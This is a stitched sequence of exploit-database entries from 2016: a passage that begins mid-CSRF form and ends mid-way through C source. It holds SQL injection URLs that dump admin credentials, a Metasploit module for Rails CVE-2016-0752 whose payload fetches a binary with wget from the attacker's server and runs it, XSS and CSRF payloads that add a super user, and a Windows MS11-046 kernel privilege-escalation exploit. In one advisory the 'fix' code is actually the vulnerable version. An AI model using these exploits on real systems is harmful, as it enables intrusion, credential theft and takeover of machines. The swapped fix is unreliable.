<input type="hidden" name="username" value="meryem" />
<input type="hidden" name="password" value="meryem123." />
<input type="hidden" name="password2" value="meryem123." />
<input type="hidden" name="email" value="b@gmail.com" />
<input type="hidden" name="language" value="en_GB" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
========================================
# Exploit Title.............. Simple Shopping Cart Application SQL Injection
# Google Dork................ inurl:"product-details.php?prodid=" "Designed by FBC Students"
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/tyron69/ecommerce_0.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in shop/product-details.php
-------------------------------
----snip----
$prodID = intval($_GET['prodid']);
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$prodname= $getProdInfo["Product"];
----snip----
Example exploitation
--------------------
http://server/shop/product-details.php?prodid=-80%27%20union%20select%201,2,concat(username,0x3a,password),4,version(),user()%20from%20user--+
How to fix
----------
Simple method's use the php function intval.
For example
$prodID = $_GET['prodid'];
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$prodname= $getProdInfo["Product"];
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html
http://php.net/manual/en/function.intval.php
# Exploit Title.............. School Full CBT SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/9859
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/fimo4real1992/cbt_by_ajijola_femi.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /show.php
-------------------------------
----snip----
$get = $_GET['show'];
$result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error());
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/show.php?show=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,user(),database(),31,32%20from%20adminlogin--+
How to fix
----------
Simple method's use the php function intval.
For example
$get = intval($_GET['show']);
$result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error());
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/node/9859
http://php.net/manual/en/function.intval.php
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the explicit render
method when leveraging user parameters.
This module has been tested across multiple versions of Ruby on Rails.
The technique used by this module requires the specified
endpoint to be using dynamic render paths, such as the following example:
def show
render params[:id]
end
Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
can literally be any endpoint. This module doesnt use the log inclusion method of
exploitation due to it not being universal enough. Instead, a new code injection
technique was found and used whereby an attacker can upload temporary image files
against any POST endpoint and use them for the inclusion attack. Finally, you only
get one shot at this if you are testing with the builtin rails server, use caution.
},
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # necromanced old bug & discovered new vector rce vector
'John Poulin (forced-request)' # original render bug finder
],
'References' =>
[
[ 'CVE', '2016-0752'],
[ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch
[ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
[ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit
],
'License' => MSF_LICENSE,
'Platform' => ['linux', 'bsd'],
'Arch' => ARCH_X86,
'Payload' =>
{
'DisableNops' => true,
},
'Privileged' => false,
'Targets' =>
[
[ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 16 2016'))
register_options(
[
Opt::RPORT(3000),
OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
], self.class)
end
def check
# this is the check for the dev environment
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "%2f"),
'method' => 'GET',
}, 60)
# if the page controller is dynamically rendering, its for sure vuln
if res and res.body =~ /render params/
return CheckCode::Vulnerable
end
# this is the check for the prod environment
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
'method' => 'GET',
}, 60)
# if we can read files, its likley we can execute code
if res and res.body =~ /ruby/
return CheckCode::Appears
end
return CheckCode::Safe
end
def on_request_uri(cli, request)
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end
def send_payload
@bd = rand_text_alpha(8+rand(8))
fn = rand_text_alpha(8+rand(8))
un = rand_text_alpha(8+rand(8))
pn = rand_text_alpha(8+rand(8))
register_file_for_cleanup("/tmp/#{@bd}")
cmd = "wget #{@service_url} -O /tmp/#{@bd};"
cmd << "chmod 755 /tmp/#{@bd};"
cmd << "/tmp/#{@bd}"
pay = "<%=`#{cmd}`%>"
print_status("uploading image...")
data = Rex::MIME::Message.new
data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
res = send_request_cgi({
'method' => 'POST',
'cookie' => @cookie,
'uri' => normalize_uri(datastore['URIPATH'], pn),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/
@path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/
return true
else
# this is where we pull the log file
if leak_log
return true
end
end
return false
end
def leak_log
# path to the log /proc/self/fd/7
# this bypasses the extension check
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
'method' => 'GET',
}, 60)
if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
@path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
return true
end
return false
end
def start_http_server
@pl = generate_payload_exe
@elf_sent = false
downfile = rand_text_alpha(8+rand(8))
resource_uri = '/' + downfile
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
# do not use SSL for the attacking web server
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
@service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
service_url_payload = srv_host + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
connect
end
def render_tmpfile
@path.gsub!(/\//, '%2f')
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], @path),
'method' => 'GET',
}, 1)
end
def exploit
print_status("Sending initial request to detect exploitability")
start_http_server
if send_payload
print_good("injected payload")
render_tmpfile
# we need to delay, for the stager
select(nil, nil, nil, 5)
end
end
end
# Exploit Title: PHP Business Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=4
# Software Link: http://www.pagereactions.com/downloads/phpbusinessdirectory.zip
--------------------------------------------------------------------------------
POC as follows :
# 0x00 Reflected XSS
---
1.In public search :
http://192.168.1.112/phpbusinessdirectory/index.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>
2.In administration web interface (need normal user login) :
http://192.168.1.112/phpbusinessdirectory/administration.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>
# 0x01 Stored XSS
---
1.In administration web directory interface (need normal user login) :
http://192.168.1.112/phpbusinessdirectory/administration.php
?pageaction=newsavebusiness
&subaction=submit
&businessname=<script>alert(1)</script>
&slogan=<script>alert(2)</script>
&businesslicence=<script>alert(3)</script>
&address=<script>alert(4)</script>
&city=<script>alert(5)</script>
&suburb=<script>alert(6)</script>
&businessstate=<script>alert(7)</script>
&country=<script>alert(8)</script>
&zippostcode=<script>alert(9)/*
&telephone1=*/</script><script>alert(10)</script>
&telephone2=<script>alert(11)</script>
&mobilecell=<script>alert(12)</script>
&fax=<script>alert(13)</script>
&email=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&productservice=<script>alert(19)</script>
&manager=<script>alert(20)</script>
&paymentsaccepted=<script>alert(21)</script>
2.In administration web categories interface (need administrator user login) :
http://192.168.1.112/phpbusinessdirectory/administration.php?pageaction=savecategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>
# 0x02 CSRF (add Super user)
---
In http://192.168.1.103/csrf.html :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phpbusinessdirectory/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
* Thanks to Besim *
/*
################################################################
# Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046)
# Date: 2016-10-16
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP Pro SP2 x64
# Windows Server 2003 SP2 x86
# Windows Server 2003 SP2 x64
# Windows Server 2003 SP2 Itanium-based Systems
# Windows Vista SP1 x86
# Windows Vista SP2 x86
# Windows Vista SP1 x64
# Windows Vista SP2 x64
# Windows Server 2008 x86
# Windows Server 2008 SP2 x86
# Windows Server 2008 x64
# Windows Server 2008 SP2 x64
# Windows Server 2008 Itanium-based Systems
# Windows Server 2008 SP2 Itanium-based Systems
# Windows 7 x86
# Windows 7 SP1 x86
# Windows 7 x64
# Windows 7 SP1 x64
# Windows Server 2008 R2 x64
# Windows Server 2008 R2 SP1 x64
# Windows Server 2008 R2 Itanium-based Systems
# Windows Server 2008 R2 SP1 Itanium-based Systems
# Supported Vulnerable Software:
# Windows XP SP3 x86
# Windows Server 2003 SP2 x86
# Windows Vista SP1 x86
# Windows Vista SP2 x86
# Windows Server 2008 x86
# Windows Server 2008 SP2 x86
# Windows 7 x86
# Windows 7 SP1 x86
# Tested Software:
# Windows XP Pro SP3 x86 EN [5.1.2600]
# Windows Server 2003 Ent SP2 EN [5.2.3790]
# Windows Vista Ult SP1 x86 EN [6.0.6001]
# Windows Vista Ult SP2 x86 EN [6.0.6002]
# Windows Server 2008 Dat SP1 x86 EN [6.0.6001]
# Windows Server 2008 Ent SP2 x86 EN [6.0.6002]
# Windows 7 HB x86 EN [6.1.7600]
# Windows 7 Ent SP1 x86 EN [6.1.7601]
# CVE ID: 2011-1249
################################################################
# Vulnerability description:
# The Ancillary Function Driver (AFD) supports Windows sockets
# applications and is contained in the afd.sys file. The afd.sys
# driver runs in kernel mode and manages the Winsock TCP/IP
# communications protocol.
# An elevation of privilege vulnerability exists where the AFD
# improperly validates input passed from user mode to the kernel.
# An attacker must have valid logon credentials and be able to
# log on locally to exploit the vulnerability.
# An attacker who successfully exploited this vulnerability could
# run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the invoking shell/process
# Exploit compiling (Kali GNU/Linux Rolling 64-bit):
# - # i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32
# Exploit prerequisites:
# - low privilege access to the target OS
# - target OS not patched (KB2503665, or any other related
# patch, if applicable, not installed - check "Related security
# vulnerabilities/patches")
# Exploit test notes:
# - let the target OS boot properly (if applicable)
# - Windows 7 (SP0 and SP1) will BSOD on shutdown/reset
################################################################
# Patches:
# Windows XP SP3 x86
# WindowsXP-KB2503665-x86-enu.exe
# (not available - EoL)
# Windows Server 2003 SP2 x86
# WindowsServer2003-KB2503665-x86-enu.exe
# https://www.microsoft.com/en-us/download/details.aspx?id=26483
# Windows Vista SP1, SP2 x86; Windows Server 2008 (SP1), SP2 x86
# Windows6.0-KB2503665-x86.msu
# https://www.microsoft.com/en-us/download/details.aspx?id=26275
# Windows 7 (SP0), SP1 x86
# Windows6.1-KB2503665-x86.msu
# https://www.microsoft.com/en-us/download/details.aspx?id=26311
################################################################
# Related security vulnerabilities/patches:
# MS11-046 KB2503665 https://technet.microsoft.com/en-us/library/security/ms11-046.aspx
# MS11-080 KB2592799 https://technet.microsoft.com/en-us/library/security/ms11-080.aspx
# MS12-009 KB2645640 https://technet.microsoft.com/en-us/library/security/ms12-009.aspx
# MS13-093 KB2875783 https://technet.microsoft.com/en-us/library/security/ms13-093.aspx
# MS14-040 KB2975684 https://technet.microsoft.com/en-us/library/security/ms14-040.aspx
#
# Table of patch replacements:
# | MS11-046 | MS11-080 | MS12-009 | MS13-093 | MS14-040 |
# -------------------------------------------------------------
# | KB2503665 | KB2592799 | KB2645640 | KB2875783 | KB2975684 |
# -----------------------------------------------------------------------------------------
# Windows x86 XP SP3 | Installed | <-Replaces| - | - | - |
# Windows x86 Server 2003 SP2 | Installed | <-Replaces| <-Replaces| - | <-Replaces|
# Windows x86 Vista SP1 | Installed | - | - | - | - |
# Windows x86 Vista SP2 | Installed | - | - | - | <-Replaces|
# Windows x86 Server 2008 | Installed | - | - | - | - |
# Windows x86 Server 2008 SP2 | Installed | - | - | - | <-Replaces|
# Windows x86 7 | Installed | - | - | - | - |
# Windows x86 7 SP1 | Installed | - | - | - | <-Replaces|
################################################################
# Thanks to:
# azy (XP, 2k3 exploit)
# Rahul Sasi (PoC)
################################################################
# References:
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1249
# https://technet.microsoft.com/en-us/library/security/ms11-046.aspx
# http://web.qhwins.com/Security/2012021712023641874126.html
# https://www.exploit-db.com/exploits/18755/
################################################################
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <ws2tcpip.h>
#pragma comment (lib, "ws2_32.lib")
////////////////////////////////////////////////////////////////
// DEFINE DATA TYPES
////////////////////////////////////////////////////////////////
typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
typedef DWORD (WINAPI *PNTQUERYINTERVAL) (
KPROFILE_SOURCE ProfileSource,
PULONG Interval
);
typedef LONG NTSTATUS;
typedef NTSTATUS (WINAPI *PNTALLOCATE) (
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
PULONG RegionSize,
ULONG AllocationType,
ULONG Protect
);
typedef struct _IO_STATUS_BLOCK {
union {
NTSTATUS Status;
PVOID Pointer;
};
ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
////////////////////////////////////////////////////////////////
// FUNCTIONS
////////////////////////////////////////////////////////////////
BOOL IsWow64()
{
BOOL bIsWow64 = FALSE;
LPFN_ISWOW64PROCESS fnIsWow64Process;
fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(GetModuleHandle(TEXT("kernel32")), "IsWow64Process");
if(NULL != fnIsWow64Process)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms684139(v=vs.85).aspx
if (!fnIsWow64Process(GetCurrentProcess(), &bIsWow64))
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
printf(" [-] Failed (error code: %d)\n", GetLastError());
return -1;
}
}
return bIsWow64;
}
////////////////////////////////////////////////////////////////
// MAIN FUNCTION
////////////////////////////////////////////////////////////////
int main(void)
{
printf("[*] MS11-046 (CVE-2011-1249) x86 exploit\n");
printf(" [*] by Tomislav Paskalev\n");
////////////////////////////////////////////////////////////////
// IDENTIFY TARGET OS ARCHITECTURE AND VERSION
////////////////////////////////////////////////////////////////
printf("[*] Identifying OS\n");
// identify target machine's OS architecture
// in case the target machine is running a 64-bit OS
if(IsWow64())
{
printf(" [-] 64-bit\n");
return -1;
}
printf(" [+] 32-bit\n");
// identify target machine's OS version
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724451(v=vs.85).aspx
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx
OSVERSIONINFOEX osvi;
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx((LPOSVERSIONINFO) &osvi);
// define operating system version specific variables
unsigned char shellcode_KPROCESS;
unsigned char shellcode_TOKEN;
unsigned char shellcode_UPID;
unsigned char shellcode_APLINKS;
const char **securityPatchesPtr;
int securityPatchesCount;
int lpInBufferSize;
////////////////////////////////////////////////////////////////
/*
OS VERSION SPECIFIC OFFSETS
references:
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/original.htm
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/late52.htm
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/current.htm
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/eprocess/
- nt!_KTHREAD.ApcState.Process (+0x10)
0x30 (3.51);
0x34 (>3.51 to 5.1);
0x28 (late 5.2);
0x38 (6.0);
0x40 (6.1);
0x70 (6.2 and higher)
- nt!_EPROCESS.Token
0x0108 (3.51 to 4.0);
0x012C (5.0);
0xC8 (5.1 to early 5.2);
0xD8 (late 5.2);
0xE0 (6.0);
0xF8 (6.1);
0xEC (6.2 to 6.3);
0xF4
- nt!_EPROCESS.UniqueProcessId
0x94 (3.51 to 4.0);
0x9C (5.0);
0x84 (5.1 to early 5.2);
0x94 (late 5.2);
0x9C (6.0);
0xB4
- nt!_EPROCESS.ActiveProcessLinks.Flink
0x98 (3.51 to 4.0);
0xA0 (5.0);
0x88 (5.1 to early 5.2);
0x98 (late 5.2);
0xA0 (6.0);
0xB8
*/
////////////////////////////////////////////////////////////////
// in case the OS version is 5.1, service pack 3
if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 3))
{
// the target machine's OS is Windows XP SP3
printf(" [+] Windows XP SP3\n");
shellcode_KPROCESS = '\x44';
shellcode_TOKEN = '\xC8';
shellcode_UPID = '\x84';
shellcode_APLINKS = '\x88';
const char *securityPatches[] = {"KB2503665", "KB2592799"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 2;
lpInBufferSize = 0x30;
}
// in case the OS version is 5.2, service pack 2, not R2
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724385(v=vs.85).aspx
else if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 2) && (osvi.wServicePackMajor == 2) && (GetSystemMetrics(89) == 0))
{
// the target machine's OS is Windows Server 2003 SP2
printf(" [+] Windows Server 2003 SP2\n");
shellcode_KPROCESS = '\x38';
shellcode_TOKEN = '\xD8';
shellcode_UPID = '\x94';
shellcode_APLINKS = '\x98';
const char *securityPatches[] = {"KB2503665", "KB2592799", "KB2645640", "KB2975684"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 4;
lpInBufferSize = 0x30;
}
// in case the OS version is 6.0, service pack 1, workstation
else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 0) && (osvi.wServicePackMajor == 1) && (osvi.wProductType == 1))
{
// the target machine's OS is Windows Vista SP1
printf(" [+] Windows Vista SP1\n");
shellcode_KPROCESS = '\x48';
shellcode_TOKEN = '\xE0';
shellcode_UPID = '\x9C';
shellcode_APLINKS = '\xA0';
const char *securityPatches[] = {"KB2503665"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 1;
lpInBufferSize = 0x30;
}
// in case the OS version is 6.0, service pack 2, workstation
else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 0) && (osvi.wServicePackMajor == 2) && (osvi.wProductType == 1))
{
// the target machine's OS is Windows Vista SP2
printf(" [+] Windows Vista SP2\n");
shellcode_KPROCESS = '\x48';
shellcode_TOKEN = '\xE0';
shellcode_UPID = '\x9C';
shellcode_APLINKS = '\xA0';
const char *securityPatches[] = {"KB2503665", "KB2975684"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 2;
lpInBufferSize = 0x10;
}
// in case the OS version is 6.0, no service pack*, server
// *Because Windows Server 2008 is based on the Windows NT 6.0 Service Pack 1 kernel, the RTM release is considered to be Service Pack 1;
// accordingly, the first service pack is called Service Pack 2.
// https://en.wikipedia.org/wiki/Windows_Server_2008
else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 0) && (osvi.wServicePackMajor == 1) && (osvi.wProductType != 1))
{
// the target machine's OS is Windows Server 2008
printf(" [+] Windows Server 2008\n");
shellcode_KPROCESS = '\x48';
shellcode_TOKEN = '\xE0';
shellcode_UPID = '\x9C';
shellcode_APLINKS = '\xA0';
const char *securityPatches[] = {"KB2503665"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 1;
lpInBufferSize = 0x10;
}
// in case the OS version is 6.0, service pack 2, server
else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 0) && (osvi.wServicePackMajor == 2) && (osvi.wProductType != 1))
{
// the target machine's OS is Windows Server 2008 SP2
printf(" [+] Windows Server 2008 SP2\n");
shellcode_KPROCESS = '\x48';
shellcode_TOKEN = '\xE0';
shellcode_UPID = '\x9C';
shellcode_APLINKS = '\xA0';
const char *securityPatches[] = {"KB2503665", "KB2975684"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 2;
lpInBufferSize = 0x08;
}
// in case the OS version is 6.1, no service pack (note: Windows Server 2008 R2 is 64-bit only)
else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 0))
{
// the target machine's OS is Windows 7
printf(" [+] Windows 7\n");
shellcode_KPROCESS = '\x50';
shellcode_TOKEN = '\xF8';
shellcode_UPID = '\xB4';
shellcode_APLINKS = '\xB8';
const char *securityPatches[] = {"KB2503665"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 1;
lpInBufferSize = 0x20;
}
// in case the OS version is 6.1, service pack 1 (note: Windows Server 2008 R2 is 64-bit only)
else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 1))
{
// the target machine's OS is Windows 7 SP1
printf(" [+] Windows 7 SP1\n");
shellcode_KPROCESS = '\x50';
shellcode_TOKEN = '\xF8';
shellcode_UPID = '\xB4';
shellcode_APLINKS = '\xB8';
const char *securityPatches[] = {"KB2503665", "KB2975684"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 2;
lpInBufferSize = 0x10;
}
// in case the OS version is not any of the previously checked versions
else
{
// the target machine's OS is an unsupported 32-bit Windows version
printf(" [-] Unsupported version\n");
printf(" [*] Affected 32-bit operating systems\n");
printf(" [*] Windows XP SP3\n");
printf(" [*] Windows Server 2003 SP2\n");
printf(" [*] Windows Vista SP1\n");
printf(" [*] Windows Vista SP2\n");
printf(" [*] Windows Server 2008\n");
printf(" [*] Windows Server 2008 SP2\n");
printf(" [*] Windows 7\n");
printf(" [*] Windows 7 SP1\n");
return -1;
}
////////////////////////////////////////////////////////////////
// LOCATE REQUIRED OS COMPONENTS
////////////////////////////////////////////////////////////////
printf("[*] Locating required OS components\n");
// retrieve system information
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms725506(v=vs.85).aspx
// locate "ZwQuerySystemInformation" in the "ntdll.dll" module
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx
FARPROC ZwQuerySystemInformation;
ZwQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQuerySystemInformation");
// 11 = SystemModuleInformation
// http://winformx.florian-rappl.de/html/e6d5d5c1-8d83-199b-004f-8767439c70eb.htm
ULONG systemInformation;
ZwQuerySystemInformation(11, (PVOID) &systemInformation, 0, &systemInformation);
// allocate memory for the list of loaded modules
ULONG *systemInformationBuffer;
systemInformationBuffer = (ULONG *) malloc(systemInformation * sizeof(*systemInformationBuffer));
if(!systemInformationBuffer)
{
printf(" [-] Could not allocate memory");
return -1;
}
// retrieve the list of loaded modules
ZwQuerySystemInformation(11, systemInformationBuffer, systemInformation * sizeof(*systemInformationBuffer), NULL);
// locate "ntkrnlpa.exe" or "ntoskrnl.exe" in the retrieved list of loaded modules
ULONG i;
PVOID targetKrnlMdlBaseAddr;
HMODULE targetKrnlMdlUsrSpcOffs;
BOOL foundModule = FALSE;
PSYSTEM_MODULE_INFORMATION loadedMdlStructPtr;
loadedMdlStructPtr = (PSYSTEM_MODULE_INFORMATION) (systemInformationBuffer + 1);
for(i = 0; i < *systemInformationBuffer; i++)
{
if(strstr(loadedMdlStructPtr[i].ImageName, "ntkrnlpa.exe"))
{
printf(" [+] ntkrnlpa.exe\n");
targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntkrnlpa.exe", 0, 1);
targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base;
foundModule = TRUE;
break;
}
else if(strstr(loadedMdlStructPtr[i].ImageName, "ntoskrnl.exe"))
{
printf(" [+] ntoskrnl.exe\n");
targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntoskrnl.exe", 0, 1);
targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base;
foundModule = TRUE;
break;
}
}
// base address of the loaded module (kernel space)
printf(" [*] Address: %#010x\n", targetKrnlMdlBaseAddr);
// offset address (relative to the parent process) of the loaded module (user space)
printf(" [*] Offset: %#010x\n", targetKrnlMdlUsrSpcOffs);
if(!foundModule)
{
printf(" [-] Could not find ntkrnlpa.exe/ntoskrnl.exe\n");
return -1;
}
// free allocated buffer space
free(systemInformationBuffer);
// determine the address of the "HalDispatchTable" process (kernel space)
// locate the offset fo the "HalDispatchTable" process within the target module (user space)
ULONG_PTR HalDispatchTableUsrSpcOffs;
HalDispatchTableUsrSpcOffs = (ULONG_PTR) GetProcAddress(targetKrnlMdlUsrSpcOffs, "HalDispatchTable");
if(!HalDispatchTableUsrSpcOffs)
{
printf(" [-] Could not find HalDispatchTable\n");
return -1;
}
printf(" [+] HalDispatchTable\n");
printf(" [*] Offset: %#010x\n", HalDispatchTableUsrSpcOffs);
// calculate the address of "HalDispatchTable" in kernel space
// 1. identify the base address of the target module in kernel space
// 2. previous step's result [minus] the load address of the same module in user space
// 3. previous step's result [plus] the address of "HalDispatchTable" in user space
// EQUIVALENT TO:
// 1. determine RVA of HalDispatchTable
// *Relative Virtual Address - the address of an item after it is loaded into memory, with the base address of the image file subtracted from it.
// 2. previous step's result [plus] base address of target module in kernel space
ULONG_PTR HalDispatchTableKrnlSpcAddr;
HalDispatchTableKrnlSpcAddr = HalDispatchTableUsrSpcOffs - (ULONG_PTR) targetKrnlMdlUsrSpcOffs;
HalDispatchTableKrnlSpcAddr += (ULONG_PTR) targetKrnlMdlBaseAddr;
// locate "NtQueryIntervalProfile" in the "ntdll.dll" module
PNTQUERYINTERVAL NtQueryIntervalProfile;
NtQueryIntervalProfile = (PNTQUERYINTERVAL) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if(!NtQueryIntervalProfile)
{
printf(" [-] Could not find NtQueryIntervalProfile\n");
return -1;
}
printf(" [+] NtQueryIntervalProfile\n");
printf(" [*] Address: %#010x\n", NtQueryIntervalProfile);
// locate "ZwDeviceIoControlFile" routine in the "ntdll.dll" module
// https://msdn.microsoft.com/en-us/library/windows/hardware/ff566441(v=vs.85).aspx
FARPROC ZwDeviceIoControlFile;
